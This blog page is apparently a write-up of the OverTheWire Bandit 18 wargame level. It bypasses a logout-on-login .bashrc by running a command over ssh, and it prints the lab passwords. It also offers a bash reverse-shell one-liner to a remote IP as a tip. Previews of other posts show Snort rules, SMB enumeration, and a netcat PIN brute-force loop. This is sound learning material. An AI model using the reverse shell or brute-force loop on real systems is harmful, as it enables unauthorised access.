Skip to main content

Bandit 18 Over The Wire

Lessons Learned

ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners

Logging in

On a kali vm/ linux machine
Type:

ssh bandit18@bandit.labs.overthewire.org -p 2220
kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

Completing The Challenge

The Goal:

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

The Solution:

kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme'
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password:
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x


Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
 


Labels

Labels:

Comments

Post a Comment

Popular posts from this blog

Snort Challenge - The Basics

Rules Ive Used # This file intentionally does not come with signatures.  Put your local # additions here. # alert icmp any any <> any any (msg: "IP ID 35369 Found"; id:35369; sid: 1000001; rev:1) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:S;  sid: 1000001; rev:1;) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:P,A;  sid: 1000001; rev:1;) # log ip any any <> any any (msg: "SAME-IP IN IP"; sameip; sid:1000001; rev:1;)#This was not used in the first snort, they only wanted the next 2 rules, which showed less dups log udp any any <> any any (msg: "SAME-IP IN TCP"; sameip; sid:1000001; rev:1;) log tcp any any <> any any (msg: "SAME-IP IN UDP"; sameip; sid:1000002; rev:1;)  Snort Params: Some Sniffer mode parameters are explained in the table below; Parameter Description -v Verbose. Display the TCP/IP output in the console. -d Display the packet data (payload). -e Display...
Post a Comment
Read more

Network Services

Network Services https://tryhackme.com/room/networkservices 3. Enumerating SMB Conduct an nmap scan of your choosing, How many ports are open? running nmap 10.10.197.190 results in PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 02:21:CD:94:98:F5 (Unknown) Show/Hide What ports is SMB running on? 139/445 Show/Hide this is the known default values for SMB Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP Show/Hide looking at the rest of the info from enum4linux -a 10.10.197.190 ill summarize here ========================== | Target Information | ========================== Target ........... 10.10.197.190 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================...
Post a Comment
Read more

Bandit 24 Over The Wire

Lessons Learned writing bash scripts that can brute force pins Logging in On a kali vm/ linux machine Type: ssh bandit24@bandit.labs.overthewire.org -p 2220 UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ Completing The Challenge The Goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. The Solution: create a file in the /tmp folder, fill in the folder with the following: for ((i=1000; i < 10000; i++)); do         echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" done | nc localhost 30002 In this code i looked up for loops, but i ended up looking up what to do to get a for loop on netcat, someone gave an answer with no context on Stack Overflow and it was the first result. a much better link is http://www.softpanorama.org/Scripting/Shellorama/Co...
Post a Comment
Read more